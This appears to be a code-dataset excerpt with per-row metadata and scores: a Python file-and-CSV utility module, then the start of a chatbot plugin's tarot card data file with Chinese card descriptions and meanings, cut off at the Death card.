%s", {True: "ON", False: "OFF"}[value]) for channel in range(self.channels_count): self._switch_channel(channel=channel, switch=value)
en
0.607986
Get the number of channels in the module Apply channel configuration # Exclude unset fields
2.268797
2
code/Sense2StopSync_sim_shift/src/utils.py
HAbitsLab/SyncWISE
0
6618641
<reponame>HAbitsLab/SyncWISE<filename>code/Sense2StopSync_sim_shift/src/utils.py<gh_stars>0 import os import csv import numpy as np import pandas as pd def create_folder(f, deleteExisting=False): ''' Create the folder Parameters: f: folder path. Could be nested path (so nested folders will be created) deleteExising: if True then the existing folder will be deleted. ''' if os.path.exists(f): if deleteExisting: shutil.rmtree(f) else: os.makedirs(f) def csv_read(path): with open(path) as fd: rd = csv.reader(fd) header = next(rd) # initialize column names from first row next_key = 0 # additional columns will start at '0' data = {k: list() for k in header} # initialize data list per column for row in rd: while len(row) > len(header): # add eventual new columns header.append(str(next_key)) data[header[-1]] = [np.nan] * len(data[header[0]]) next_key += 1 # increase next column name # eventually extend the row up to the header size row.extend([np.nan] * (len(header) - len(row))) # and add data to the column lists for i, k in enumerate(header): data[k].append(row[i]) # data is now in a dict format, suitable to feed DataFrame return pd.DataFrame(data)
import os import csv import numpy as np import pandas as pd def create_folder(f, deleteExisting=False): ''' Create the folder Parameters: f: folder path. Could be nested path (so nested folders will be created) deleteExising: if True then the existing folder will be deleted. ''' if os.path.exists(f): if deleteExisting: shutil.rmtree(f) else: os.makedirs(f) def csv_read(path): with open(path) as fd: rd = csv.reader(fd) header = next(rd) # initialize column names from first row next_key = 0 # additional columns will start at '0' data = {k: list() for k in header} # initialize data list per column for row in rd: while len(row) > len(header): # add eventual new columns header.append(str(next_key)) data[header[-1]] = [np.nan] * len(data[header[0]]) next_key += 1 # increase next column name # eventually extend the row up to the header size row.extend([np.nan] * (len(header) - len(row))) # and add data to the column lists for i, k in enumerate(header): data[k].append(row[i]) # data is now in a dict format, suitable to feed DataFrame return pd.DataFrame(data)
en
0.729216
Create the folder Parameters: f: folder path. Could be nested path (so nested folders will be created) deleteExising: if True then the existing folder will be deleted. # initialize column names from first row # additional columns will start at '0' # initialize data list per column # add eventual new columns # increase next column name # eventually extend the row up to the header size # and add data to the column lists # data is now in a dict format, suitable to feed DataFrame
3.547161
4
omega_miya/plugins/tarot/tarot_data.py
rinrini001/omega-miya
120
6618642
""" @Author : Ailitonia @Date : 2021/08/31 21:24 @FileName : tarot_data.py @Project : nonebot2_miya @Description : 塔罗卡牌及卡组数据 虽然这里看起来使用 json 会更好 但还是用 dataclass 硬编码了:( @GitHub : https://github.com/Ailitonia @Software : PyCharm """ from typing import List from dataclasses import dataclass, field, fields from .tarot_typing import Element, Constellation, TarotCard, TarotPack @dataclass class Elements: earth: Element = field(default=Element(id=0, orig_name='Earth', name='土元素'), init=False) water: Element = field(default=Element(id=0, orig_name='Water', name='水元素'), init=False) air: Element = field(default=Element(id=0, orig_name='Air', name='风元素'), init=False) fire: Element = field(default=Element(id=0, orig_name='Fire', name='火元素'), init=False) aether: Element = field(default=Element(id=0, orig_name='Aether', name='以太'), init=False) @dataclass class Constellations: pluto: Constellation = field(default=Element(id=-9, orig_name='Pluto', name='冥王星'), init=False) neptunus: Constellation = field(default=Element(id=-8, orig_name='Neptunus', name='海王星'), init=False) uranus: Constellation = field(default=Element(id=-7, orig_name='Uranus', name='天王星'), init=False) saturn: Constellation = field(default=Element(id=-6, orig_name='Saturn', name='土星'), init=False) jupiter: Constellation = field(default=Element(id=-5, orig_name='Jupiter', name='木星'), init=False) mars: Constellation = field(default=Element(id=-4, orig_name='Mars', name='火星'), init=False) earth: Constellation = field(default=Element(id=-3, orig_name='Earth', name='地球'), init=False) moon: Constellation = field(default=Element(id=-10, orig_name='Moon', name='月亮'), init=False) venus: Constellation = field(default=Element(id=-2, orig_name='Venus', name='金星'), init=False) mercury: Constellation = field(default=Element(id=-1, orig_name='Mercury', name='水星'), init=False) sun: Constellation = field(default=Element(id=0, orig_name='Sun', name='太阳'), init=False) aries: Constellation = field(default=Element(id=1, orig_name='Aries', name='白羊座'), init=False) taurus: Constellation = field(default=Element(id=2, orig_name='Taurus', name='金牛座'), init=False) gemini: Constellation = field(default=Element(id=3, orig_name='Gemini', name='双子座'), init=False) cancer: Constellation = field(default=Element(id=4, orig_name='Cancer', name='巨蟹座'), init=False) leo: Constellation = field(default=Element(id=5, orig_name='Leo', name='狮子座'), init=False) virgo: Constellation = field(default=Element(id=6, orig_name='Virgo', name='室女座'), init=False) libra: Constellation = field(default=Element(id=7, orig_name='Libra', name='天秤座'), init=False) scorpio: Constellation = field(default=Element(id=8, orig_name='Scorpio', name='天蝎座'), init=False) sagittarius: Constellation = field(default=Element(id=9, orig_name='Sagittarius', name='人马座'), init=False) capricorn: Constellation = field(default=Element(id=10, orig_name='Capricorn', name='摩羯座'), init=False) aquarius: Constellation = field(default=Element(id=11, orig_name='Aquarius', name='宝瓶座'), init=False) pisces: Constellation = field(default=Element(id=12, orig_name='Pisces', name='双鱼座'), init=False) @dataclass class TarotCards: """ 所有卡牌 每个属性都是一张牌 """ @classmethod def get_all_cards(cls) -> List[TarotCard]: """ 获取所有塔罗牌的列表 :return: List[TarotCard] """ return [field_.default for field_ in fields(cls) if field_.type == TarotCard] blank: TarotCard = field(default=TarotCard( id=-1, index='blank', type='special', orig_name='Blank', name='空白', intro='空白的卡面,似乎可以用来作为卡牌背面图案使用', words='', desc='', upright='', reversed='' ), init=False) the_fool: TarotCard = field(default=TarotCard( id=0, index='the_fool', type='major_arcana', orig_name='The Fool', name='愚者', intro='愚人穿着色彩斑斓的服装,头上戴顶象征成功的桂冠,无视于前方的悬崖,昂首阔步向前行。\n\n他左手拿着一朵白玫瑰,白色象征纯洁,玫瑰象征热情。他的右手则轻轻握着一根杖,象征经验的包袱即系于其上。那根杖可不是普通的杖,它是一根权杖,象征力量。愚人脚边有只小白狗正狂吠着,似乎在提醒他要悬崖勒马,又好像随他一同起舞。无论如何,愚人仍旧保持着欢欣的神色,望向遥远的天空而非眼前的悬崖,好像悬崖下会有个天使扥住他似的,他就这样昂首阔步地向前走。远方的山脉象征他前方未知的旅程,白色的太阳自始至终都目睹着愚人的一举一动──他从哪里来?他往何处去?他又如何回来?', words='流浪', desc='愚人牌暗示着你现在不顾风险而有所行动。\n\n愚人是一张代表自发性行为的牌,一段跳脱某种状态的日子,或尽情享受眼前日子的一段时光。对旅游而言,这是一张积极的牌,暗示你将会活在当下,并且会有和生命紧密结合的感觉。“每天都充实,乐趣便在其中”是一句很适合这张牌的古谚语。当你周遭的人都对某事提防戒慎,你却打算去冒这个险时,愚人牌可能就会出现。\n\n愚人暗示通往满足之路是经由自发的行动,而长期的计划则是将来的事。', upright='盲目的、有勇气的、超越世俗的、展开新的阶段、有新的机会、追求自我的理想、展开一段旅行、超乎常人的勇气、漠视道德舆论的。', reversed='过于盲目、不顾现实的、横冲直撞的、拒绝负担责任的、违背常理的、逃避的心态、一段危险的旅程、想法如孩童般天真幼稚的。' ), init=False) the_magician: TarotCard = field(default=TarotCard( id=1, index='the_magician', type='major_arcana', orig_name='The Magician (I)', name='魔术师', intro='魔术师高举拿着权杖的右手指向天,左手食指指向地,他本人就是沟通上天与地面的桥梁。他身前的桌上放着象征四要素的权杖、圣杯、宝剑与星币,同时也代表塔罗牌的四个牌组。他身穿的大红袍子象征热情与主动,白色内衫表示纯洁与智慧的内在。缠绕他腰间的是一条青蛇,蛇虽然经常象征邪恶,但在这里代表的是智慧与启发。魔术师头顶上有个倒8符号,代表无限。画面前方和上方的红玫瑰象征热情,白百合象征智慧。此时,万事齐备,魔术师可以开始进行他的新计划了。和愚人牌同样鲜黄色的背景,预示未来成功的可能。', words='创造', desc='魔术牌意味着:现在是展开新计划的好时机。\n\n魔术师这张牌意味这是个着手新事物的适当时机。对的时间、对的机会、对的动机,使你的努力值回票价。对于展开行动、实现计划而言,这正是一个良好时机。由于你已为实现计划扎下良好基础,所以新的冒险很可能会实现。清楚的方向感和意志力的贯彻,大大的提升了成功的可能性。', upright='成功的、有实力的、聪明能干的、擅长沟通的、机智过人的、唯我独尊的、企划能力强的、透过更好的沟通而获得智慧、运用智慧影响他人、学习能力强的、有教育和学术上的能力、表达技巧良好的。', reversed='变魔术耍花招的、瞒骗的、失败的、狡猾的、善于谎言的、能力不足的、丧失信心的、以不正当手段获取认同的。' ), init=False) the_high_priestess: TarotCard = field(default=TarotCard( id=2, index='the_high_priestess', type='major_arcana', orig_name='The High Priestess (II)', name='女祭司', intro='相较于上一张魔术师纯粹阳性的力量,女祭司表现的则是纯粹阴性的力量。她身穿代表纯洁的白色内袍,与圣母的蓝色外袍,静默端坐。胸前挂个十字架,象征阴阳平衡、与神合一。\n\n她头戴的帽子是由上弦月、下弦月和一轮满月所构成的,象征所有的处女神祇。手上拿着滚动条,象征深奥的智慧,其上的TORA字样,意为“神圣律法”,而滚动条卷起并半遮着,暗示此律法不为人所知。在她脚边的一轮新月,为她的内袍衣角所固定住,袍子并延伸到图面之外。女祭司两侧一黑一白的柱子,存在于圣经故事中所罗门王在耶路撒冷所建的圣殿中,黑白柱上的B与J字样,分别是Boas和Jachin的缩写,黑柱是阴而白柱是阳,两柱象征二元性,坐在中间的女祭司则不偏不倚,统合两者的力量。柱子上面的喇叭造型,代表女祭司敏锐的感受性,上面的百合花纹则象征纯洁与和平。两柱之间有帷幕遮着,帷幕上的石榴代表“阴”,棕榈代表“阳”。帷幕把后方的景色遮住了,仔细一看,依稀可见由水、山丘与的蓝天构成的背景。水象征情感与潜意识,这一片水平静无波,但其静止的表面下蕴藏深沉的秘密。整个图面呈现象征智慧的蓝色调,双柱的意象在后面的牌中重复出现。', words='智慧', desc='女祭司意味着:这是向内探索、沉思,或按兵不动的时刻。\n\n女祭司代表去思考可以导致实际结果的构想。这并不是一张代表具体事物的牌,而是一张代表可能性的牌。我们每个人都在我们的人生当中持续的耕耘和收获,而女祭司就是散播那些种子或理念的行动。\n\n女祭司暗示你应该要相信你的直觉,因为在这一点上,有些东西你可能看不见。高位的女祭司是一张代表精神和心灵发展的牌。它代表了向内心探索的一段时期,以便为你人生的下一个阶段播种,或者去消化你在肉体的层次上所处理的事情。', upright='纯真无邪的、拥有直觉判断能力的、揭发真相的、运用潜意识的力量、掌握知识的、正确的判断、理性的思考、单恋的、精神上的恋爱、对爱情严苛的、回避爱情的、对学业有助益的。', reversed='冷酷无情的、无法正确思考的、错误的方向、迷信的、无理取闹的、情绪不安的、缺乏前瞻性的、严厉拒绝爱情的。' ), init=False) the_empress: TarotCard = field(default=TarotCard( id=3, index='the_empress', type='major_arcana', orig_name='The Empress (III)', name='女皇', intro='体态丰腴的皇后坐在宝座上,手持象征地球的圆形手杖,戴着由九颗珍珠组成的项链,象征九颗行星,也代表金星维纳斯。皇后头冠由十二个六角星组成,象征十二星座与一年的十二个月。更进一步,六角星本身是由一个正三角形和倒三角形组成,分别代表火要素和水要素。除了头冠之外,她还戴着香桃木叶作成的头环,象征金星维纳斯。她身穿的宽松袍子上面画满象征多产的石榴,宝座下方则是个绘有金星符号的心形枕头。她前方的麦田已经成熟,代表丰饶与多产;后方则是茂密的丝柏森林,与象征生命力的瀑布河流。', words='丰收', desc='女皇牌暗示家庭和谐及稳定。\n\n简单言之,女皇可能意味着实现计划,或朝向计划的下一个自然步骤迈进,亦即你又向目标靠近了一步。女皇牌也可能暗示一趟乡野之旅,或是休息一阵子并重返大自然的怀抱,因为她四周围绕着自然的产物。透过亲近自然,现在是你重新平衡自己的时候。这张牌意味家庭状态的稳定与和谐,而这通常是透过把爱从思考当中,带往内心来达成的。', upright='温柔顺从的、高贵美丽的、享受生活的、丰收的、生产的、温柔多情的、维护爱情的、充满女性魅力的、具有母爱的、有创造力的女性、沈浸爱情的、财运充裕的、快乐愉悦的。', reversed='骄傲放纵的、过度享乐的、浪费的、充满嫉妒心的、母性的独裁、占有欲、败家的女人、挥霍无度的、骄纵的、纵欲的、为爱颓废的、不正当的爱情、不伦之恋、美丽的诱惑。' ), init=False) the_emperor: TarotCard = field(default=TarotCard( id=4, index='the_emperor', type='major_arcana', orig_name='The Emperor (IV)', name='皇帝', intro='一国之尊的皇帝头戴皇冠,身着红袍,脚穿象征严格纪律的盔甲,左手拿着一颗球,右手持的是象征生命的古埃及十字架,自信满满的坐在王位上。\n\n王位上有四个牡羊头作为装饰,如图所示,皇帝牌正是代表牡羊座的牌。牡羊座是十二星座的头一个,具有勇敢、积极、有野心、有自信的特质。红袍加上橙色的背景,呈现红色的主色调,与牡羊座的特性不谋而合。背景严峻的山象征前方险峻的路途。我们可以比较皇帝与皇后的背景,一个是严峻山川,一个是丰饶大地,形成互补的局面。', words='支配', desc='皇帝表示一种训练和实际致力于生活。\n\n皇帝意味透过自律和实际的努力而达到成功。它可以代表你生活中一段相当稳定,且井然有序的时光。这张牌可以暗示遭遇到法律上的问题,或是碰到某个地位、权利都在你之上的人,例如法官、警员、父亲,或具有父亲形象的人。\n\n为了成功,现在正是你采取务实态度来面对人生的时候。你被周遭的人设下种种限制,但只要你能在这些限制之内努力的话,你还是可以达成你的目标。', upright='事业成功、物质丰厚、掌控爱情运的、有手段的、有方法的、阳刚的、独立自主的、有男性魅力的、大男人主义的、有处理事情的能力、有点独断的、想要实现野心与梦想的。', reversed='失败的、过于刚硬的、不利爱情运的、自以为是的、权威过度的、力量减弱的、丧失理智的、错误的判断、没有能力的、过于在乎世俗的、权力欲望过重的、权力使人腐败的、徒劳无功的。' ), init=False) the_hierophant: TarotCard = field(default=TarotCard( id=5, index='the_hierophant', type='major_arcana', orig_name='The Hierophant (V)', name='教皇', intro='教皇身穿大红袍子,端坐在信众前。他头戴象征权力的三层皇冠,分别代表身心灵三种层次的世界。\n\n他的右手食中指指向天,象征祝福﹔左手持着主字形的权杖,象征神圣与权力。他耳朵旁边垂挂的白色小物,代表内心的声音。教皇前方放着两把交叉的钥匙,在很多版本的塔罗牌里,钥匙是金色银色各一把,象征阳与阴,日与月,外在与内在,我们的课题就是要学会如何结合两者,而钥匙本身可用以开启智慧与神秘之门。教皇前方的两位信众,左边的身穿象征热情的红玫瑰花纹衣裳,右边则穿象征性灵成长的白百合衣裳(红玫瑰与白百合在魔术师也曾出现过)。教皇与信众三人的衣服都有牛轭形(Y字形)装饰,牛轭的用途是促使受过训练的动物去工作的,出现在教皇牌的道理值得深思。教皇后方则是曾经在女祭司中出现的两根柱子,不过在这里它们是灰色的,灰色象征由经验而来的智慧﹔另一说则是教皇后方虽无女祭司的帷幕将潜意识隔离,但暗沉的灰色代表通往潜意识之路仍未开启。柱子上的图案象征肉体结合。', words='援助', desc='教皇代表需要为你的心灵成长,及人生方向付起责任。\n\n教皇暗示你向某人或某个团体的人屈服了。或许这正是你为自己,及心灵上的需求负起责任的时刻了。你目前的行事作风并非应付事情的唯一方式,假设你愿意加以探索的话,或许你就会找到新的可能。', upright='有智慧的、擅沟通的、适时的帮助、找到真理、有精神上的援助、得到贵人帮助、一个有影响力的导师、找到正确的方向、学业出现援助、爱情上出现长辈的干涉、媒人的帮助。', reversed='过于依赖的、错误的指导、盲目的安慰、无效的帮助、独裁的、疲劳轰炸的、精神洗脑的、以不正当手段取得认同的、毫无能力的、爱情遭破坏、第三者的介入。' ), init=False) the_lovers: TarotCard = field(default=TarotCard( id=6, index='the_lovers', type='major_arcana', orig_name='The Lovers (VI)', name='恋人', intro='恋人牌背景在伊甸园,亚当与夏娃分站两边,两者皆裸身,代表他们没什么需要隐藏的。两人所踩的土地相当肥沃,生机盎然。\n\n夏娃的背后是知识之树,生有五颗苹果,象征五种感官,有条蛇缠绕树上。蛇在世界文化中的象征丰富多元,此处可能象征智慧,也象征欲望与诱惑。牠由下往上缠绕在树上,暗示诱惑经常来自潜意识。亚当背后是生命之树,树上有十二团火焰,象征十二星座,也象征欲望之火。伟特说:“亚当与夏娃年轻诱人的躯体,象征未受有形物质污染之前的青春、童贞、纯真和爱”。两人背后的人物是风之天使拉斐尔(Raphael),风代表沟通,祂身穿的紫袍则是忠贞的象征,显示这个沟通的重要性。亚当看着夏娃,夏娃则望着天使,象征“意识─潜意识─超意识”与“身─心─灵”或是“理性─感性”之间的传导。天使之下,亚当夏娃中间有一座山,象征意义解读众多,主要有三种:一说是山代表阳性,水代表阴性,两者表现阴阳平衡,意味我们必须把阴与阳、理性与感性的能量调和。一说认为这座山象征正当思想的丰饶果实。另一说则认为它代表高峰经验与极乐。', words='结合', desc='恋人牌意味,为了爱的关系而做的某些决定。\n\n恋人是一张代表决定的牌,而且除非问的是某个特定的问题,否则它通常是指有关两性关系的决定。它可能是在描述沉浸在爱恋之中的过程,因为它可以意指一段两性关系中的最初,或者是罗曼蒂克的阶级。恋人牌也可以形容在决定到底要保留就有的关系,或转进新关系当中。它暗示你已经由过去经验而得到成长了,因此你可以安全的迈向一个新的阶段。', upright='爱情甜蜜的、被祝福的关系、刚萌芽的爱情、顺利交往的、美满的结合、面临工作学业的选择、面对爱情的抉择、下决定的时刻、合作顺利的。', reversed='遭遇分离、有第三者介入、感情不合、外力干涉、面临分手状况、爱情已远去、无法结合的、遭受破坏的关系、爱错了人、不被祝福的恋情、因一时的寂寞而结合。' ), init=False) the_chariot: TarotCard = field(default=TarotCard( id=7, index='the_chariot', type='major_arcana', orig_name='The Chariot (VII)', name='战车', intro='一位英勇的战士驾着一座由两只人面狮身兽拉着的战车。人面狮身兽一只是黑的,代表严厉,另一只是白的,代表慈悲。两兽同时来看,也是阴阳平衡的象征。\n\n战车上有四根柱子(四个代表上帝的希伯来字母YHWH或火水风土四要素)支撑着蓝色车棚,车棚上饰以六角星花纹,象征天体对战士成功的影响。英勇的战士手持象征意志与力量的矛形权杖,头戴象征统治的八角星头冠和象征胜利的桂冠,身穿盔甲。盔甲上的肩章呈现弦月形,显示战车牌与属月亮的巨蟹座之关联。斜挂的腰带上有占星学符号,裙上有各种炼金术的符号。胸前的四方形图案代表土要素,象征意志的力量。战车前方的翅膀图案是古埃及的图腾,代表灵感。翅膀下面是一个小盾牌,其上的红色的图案是一种印度图腾,为男性与女性生殖器结合的象征,也是二元性与一元性,类似中国的阴与阳,可能暗示编号七的战车牌走过愚人之旅的三分之一,已达性成熟的阶段。战士身后的河流就是圣经创世纪中四条伊甸园之河其中的一条,与皇后、皇帝和、死神牌中的河是同一条。再后面就是一座高墙耸立的城市。战士背对城市,暗示他把物质置于身后,向前开展心灵上的旅程。他手上没有缰绳,表示他不是用肉体来控制那两头朝不同方向行进的人面狮身兽,而完全凭借他旺盛过人的意志力。值得注意的一点是他站在城墙外守御,而非进攻,所以这位战士是位守护者、防御者,而不是侵略者。他是尽他的本分,并努力做到最好。', words='胜利', desc='战车牌意味训练有素的心智。\n\n战车可以代表一部车,或是坐车旅行。当这张牌出现时,它可能意味着你需要控制生命中互相对抗的力量。目前的情况可能会出现某些矛盾,而你正以理智在控制着它们。\n\n这是一张代表由于坚持而取得成功的牌。如果用来形容一个人的话,战车是暗示这个人(通常是指男人),掌控着她自己和周遭的事物。正立的战车也可能意指一桩重要的生意,或意义重大的成功。', upright='胜利的、凯旋而归的、不断的征服、有收获的、快速的解决、交通顺利的、充满信心的、不顾危险的、方向确定的、坚持向前的、冲劲十足的。', reversed='不易驾驭的、严重失败、交通意外、遭遇挫折的、遇到障碍的、挣扎的、意外冲击的、失去方向的、丧失理智的、鲁莽冲撞的。' ), init=False) strength: TarotCard = field(default=TarotCard( id=8, index='strength', type='major_arcana', orig_name='Strength (VIII)', name='力量', intro='代表力量的女人轻柔地合上狮子的嘴。女人头上有魔术师牌中出现的倒8符号,象征她的力量是无穷尽的。她头上戴着花环,腰间也系着花环,而且腰间花环还连系在狮子颈间,形成第二个倒8符号。狮子身体微倾,尾巴轻垂,表现出彻底的顺服,还伸出舌头来舔着女人的手。', words='意志', desc='力量牌暗示你拥有足够的内在力量去面对人生。\n\n这张力量牌意味你有能力面对生活和困难的环境,或者有能力以希望、内在力量及勇气去做改变。勇气并不代表你没有恐惧,而是虽然你有恐惧,你还是愿意对某人或某事有所承诺。\n\n这张牌象征你拥有内在的力量来面对你内在的恐惧和欲望,而非让它们屈服于你的意志。在健康的分析方面,这张牌可能是有关心脏或脊椎方面的毛病,不过这些毛病也可以透过内在能量来克服,而且这张牌也暗示你本身拥有这种能量。', upright='内在的力量使成功的、正确的信心、坦然的态度、以柔克刚的力量、有魅力的、精神力旺盛、有领导能力的、理性的处理态度、头脑清晰的。', reversed='丧失信心的、失去生命力的、沮丧的、失败的、失去魅力的、无助的、情绪化的、任性而为的、退缩的、没有能力处理问题的、充满负面情绪的。' ), init=False) the_hermit: TarotCard = field(default=TarotCard( id=9, index='the_hermit', type='major_arcana', orig_name='The Hermit (IX)', name='隐者', intro='身穿灰色斗篷和帽子的老人站在冰天雪地的山巅上,低头沉思,四周渺无人烟。他右手高高举着一盏灯,这是真理之灯,灯里是颗发亮的六角星,名称是所罗门的封印,散发出潜意识之光。老人左手拄着一根族长之杖,这跟杖在愚人、魔术师、战车都曾经出现过。愚人太过天真,不知杖的魔力,拿它来系包袱;魔术师用代表意识的右手运用杖的法力;战车把杖化为矛,也用右手紧握着;隐士则杖交左手,用以在启蒙之路上做前导。', words='探索', desc='隐士牌暗示着:省思的一段时间。\n\n隐士牌暗示一段反省的时间。它代表着一段想要让你的过去、现在,以及未来成为有意义的时间。这张牌代表去看咨商辅导员、持续一段梦想之旅,或为了开发你自己的沉思。它也代表成熟,以及你已经知道生命中真正重要的是什么。\n\n它可能意味着得到身体或心灵上的协助及智因;或是你帮助其他人发现人生理解及事件的导因。它也代表一段时间内,你会问自己如下的问题:我从何处来?我现在位于何处?又将往何处去?', upright='有骨气的、清高的、有智慧的、有法力的、自我修养的,生命的智慧情境、用智慧排除困难的、给予正确的指导方向、有鉴赏力的、三思而后行的、谨慎行动的。', reversed='假清高的、假道德的、没骨气、没有能力的、内心孤独寂寞的、缺乏支持的、错误的判断、被排挤的、没有足够智慧的、退缩的、自以为是的、与环境不合的。' ), init=False) wheel_of_fortune: TarotCard = field(default=TarotCard( id=10, index='wheel_of_fortune', type='major_arcana', orig_name='Wheel of Fortune (X)', name='命运之轮', intro='所有的大牌都有人物,命运之轮是唯一的例外,可见这张牌独树一格。深蓝色的天空悬着一个轮子,轮盘由三个圆圈构成(教宗的头冠也是),最里面的小圈代表创造力,中间是形成力,最外层是物质世界。小圈里头没有任何符号,因为创造力潜能无限;中间圆圈里有四个符号,从上方顺时针依序是炼金术中的汞风、硫、水,分别与风火水土四要素相关联,是形成物质世界的基本要素﹔最外层就是物质世界,上右下左四方位分别是TARO四个字母,这四个字母可以组成Rota(轮)、Orat(说)、Tora(律法)、Ator(哈扥尔女神),形成一个完整的句子“塔罗之轮述说哈扥尔女神的律法”,其余四个符号是希伯来字母YHVH,是上帝最古老的名字。轮盘从中心放射出八道直线,代表宇宙辐射能量。\n\n在轮盘左方有一条往下行进的蛇,是埃及神话中的邪恶之神Typhon,牠的向下沉沦带着轮子进入分崩离析的黑暗世界。相反的,背负轮盘的胡狼头动物渴求上升,牠是埃及神话中的阿努比神(Anubis)。而上方的人面狮身兽是智慧的象征,均衡持中,在变动中保持不变。牠拿着的宝剑代表风要素,表示心智慧力、思考力和智慧。\n\n四个角落的四只动物,从右上方顺时针看分别是老鹰、狮子、牛、人,而且他们都有翅膀。这四个动物出自圣经启示录第四章“宝座周围有四个活物,前后遍体都满了眼睛。第一个活物像狮子,第二个像牛犊,第三个脸面像人,第四个像飞鹰”,耶路撒冷圣经提到四活物象征四位福音书的作者(马太、马可、路加和约翰)。在占卜上这四个动物与占星学产生关联,分别代表四个固定星座和四要素,老鹰是天蝎座(水),狮子是狮子座(火),牛是金牛座(土),人是水瓶座(风)。牠们都在看书,汲取智慧,而翅膀赋予牠们在变动中保持稳定的能力。', words='轮回', desc='命运之轮意味着你境遇的改变。观察这个改变,并留意它的模式。\n\n生命是变化无常的,当牌面上的命运之轮是正立时,改变似乎是有利的;而当它倒立时,改变又似乎是有害的。它只是改变,而似乎有害的改变,事实上可能会是一种祝福。你必须超越现状,将眼光放远,来观察生命的消长。\n\n通常命运之轮象征你生命境遇的改变。或许你并不了解这些改变的原因,不过在这里,你如何因应改变是比较重要的。你要迎接生命所提供给你的机会,还是要抗拒改变呢?此牌正立时就是在告诉你,要去适应这些改变。', upright='忽然而来的幸运、即将转变的局势、顺应局势带来成功、把握命运给予的机会、意外的发展、不可预测的未来、突如其来的爱情运变动。', reversed='突如其来的厄运、无法抵抗局势的变化、事情的发展失去了掌控、错失良机、无法掌握命运的关键时刻而导致失败、不利的突发状况、没有答案、被人摆布、有人暗中操作。' ), init=False) justice: TarotCard = field(default=TarotCard( id=11, index='justice', type='major_arcana', orig_name='Justice (XI)', name='正义', intro='一个女人端坐在石凳上,右手持剑高高举起,左手在下拿着天秤。身穿红袍,头戴金冠,绿色披肩用一个方形扣子扣起。她的右脚微微往外踏出,似乎想站起来,而左脚仍隐藏在袍子里面。她高举宝剑,象征她的决心。宝剑不偏不倚,象征公正,且智慧可以戳破任何虚伪与幻象。宝剑两面都有刃,可行善可行恶,端看个人选择。左手的金色天秤和披肩的绿色都是天秤座的象征。手持天秤表示她正在评估,正要下某个决定,同时追求平衡。胸前的方形扣子中间是个圆形,象征四要素的调和。头上的金冠中心有个四方形宝石,加上金冠的三个方顶,加起来得到数字七,代表金星,也就是天秤座的守护星。后方是个紫色帷幕,象征隐藏的智慧。两边柱子象征正面和负面的力量。', words='均衡', desc='正义意味,这是一段你为你的人生决定负起责任的时光。\n\n正义意味事情已经达成它应有的使命。也就是说,你过往的决定或行为已经引导你走到了目前的境遇。你已经得到你应得的了,如果你对自己是够诚实的话,你肯定知道这点。它代表你应该对自己,以及周遭的人绝对的诚实。你应该自己,以及使你成为今天这个样子的种种决定负起责任。你的未来可能会因为你目前的决定、行为或理解而改变。', upright='明智的决定、看清了真相、正确的判断与选择、得到公平的待遇、走向正确的道路、理智与正义战胜一切、维持平衡的、诉讼得到正义与公平、重新调整使之平衡、不留情面的。', reversed='错误的决定、不公平的待遇、没有原则的、缺乏理想的、失去方向的、不合理的、存有偏见的、冥顽不灵的、小心眼、过于冷漠的、不懂感情的。' ), init=False) the_hanged_man: TarotCard = field(default=TarotCard( id=12, index='the_hanged_man', type='major_arcana', orig_name='The Hanged Man (XII)', name='倒吊人', intro='倒吊人图案简单,涵义却深远。我们看到一个男人在一棵T字形树上倒吊着。他两手背在背后,形成一个三角形。两腿交叉形成十字。十字和三角形结合在一起,就是一个炼金符号,象征伟大志业的完成,也象征低层次的欲望转化到高层次的灵魂(炼成黄金)。\n\n红裤子象征身心灵中的“身”,也就是人类的欲望和肉体。蓝上衣即身心灵中的“心”,象征知识。他的金发和光环象征智慧和心灵的进化,也就是“灵”。金色的鞋子则象征倒吊人崇高的理想。在某些版本的塔罗牌中,倒吊人就是神话中的奥丁(Odin),他身后的树就是北欧神话中的义格卓席尔巨树(Yggdrasil),也称作世界之树,由地狱(潜意识)开始生长,经过地面(意识),直达天庭(超意识)。还记得皇帝右手拿着一根象征生命的古埃及十字架吗?古埃及十字架代表希伯来的第十九个字母Tau,是属于世间的一个字母,而倒吊人倒吊的T字树,正是它的下半部,表示倒吊人仍然是入世的。', words='牺牲', desc='“以将有更美好的事物降临于你身上的信念,顺从于人生”是倒吊人这张牌所传达的讯息。\n\n倒吊人是一张代表投降的牌。它暗示,当你在这段期间内,透过对生命的顺从,并让它引领你到你需要去的地方,那么你便可以获益良多。\n\n倒吊人还是一张代表独立的牌。这段期间内,你应该顺着感觉走,或是接受自己,即使别人都认为你的方式很奇怪也不打紧。它也可能象征,经历了生命中一段艰难的时光后的心灵平静。\n\n现在不是挣扎的时候,静下来好好思考你过去的行为,以及未来的计划。这只是一个暂时的状态,只要你妥善的运用这段时间,对你应该是有好处的。让生命中的事物自然而然的发生,或许你会对结果感到惊喜。带着“会有更美好的事情临降,来取代你所捐弃的事物”的信念,顺从于人生。花点时间来观察潜伏于事件底下的生命潮流。生命会给你一段宁静的时光,远离世界的纷纷扰扰,所以善用这段时光将是明智之举。', upright='心甘情愿的牺牲奉献、以修练的方式来求道、不按常理的、反其道而行的、金钱上的损失、正专注于某个理想的、有坚定信仰的、长时间沈思的、需要沈淀的、成功之前的必经之道。', reversed='精神上的虐待、心不甘情不愿的牺牲、损失惨重的、受到亏待的、严重漏财的、不满足的、冷淡的、自私自利的、要求回报的付出、逃离綑绑和束缚、以错误的方式看世界。' ), init=False) death: TarotCard = field(default=TarotCard( id=13, index='death', type='major_arcana', orig_name='Death (XIII)', name='死神', 